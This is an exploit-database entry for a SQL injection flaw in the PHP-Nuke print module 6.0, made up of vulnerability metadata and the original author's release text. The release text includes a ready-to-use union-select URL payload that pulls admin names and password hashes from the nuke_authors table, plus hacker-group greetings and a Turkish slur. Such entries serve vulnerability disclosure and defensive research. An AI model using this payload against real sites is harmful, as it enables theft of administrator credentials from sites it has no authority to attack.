PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability

vendor:

PHP-Nuke Module print

by:

Gamoscu

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP-Nuke Module print

Affected Version From: 6.0

Affected Version To: 6.0

Patch Exists: NO

Related CWE: N/A

CPE: a:phpnuke:php-nuke_module_print

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability

A SQL injection vulnerability exists in PHP-Nuke Module print 6.0, which allows an attacker to execute arbitrary SQL commands via the 'sid' parameter in the 'modules.php?name=News&file=print' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability
      
###########################  
Author    : Gamoscu
Homepage  : www.1923turk.com
Blog      : http://gamoscu.wordpress.com
Script    : PHP-Nuke Module print 6.0 
Download  : http://phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=6 
###########################    
        
[ Vulnerable File ]  
    
modules.php?name=News&file=print&sid= [ SQL ]  
         
    
[ XpL ]  
      
http://www.xxxxx/modules.php?name=News&file=print&sid=-1+union+select+1,2,pwd,aid,5,6,7+from+nuke_authors--


Deli Kurtlar derki:
    
~~~~Yerinde sayanlar,Yürüyenlerden cok gürültü yaparlar!~~~~


Lamer ibneleri!!  sizi suleyman dayýya havale ediyorum :) onlar Kendilerini iyi bilirler

Maskeli5ler cok yakinda  Deli KurtlarLA Donuyor
      
Baybora :http://baybora.wordpress.com

X-TRO   :http://maskeli5ler.wordpress.com
  
       
##############################################################    
# Greetz: Manas58 - - Delibey - Tiamo - Psiko - Turco - infazci      
##############################################################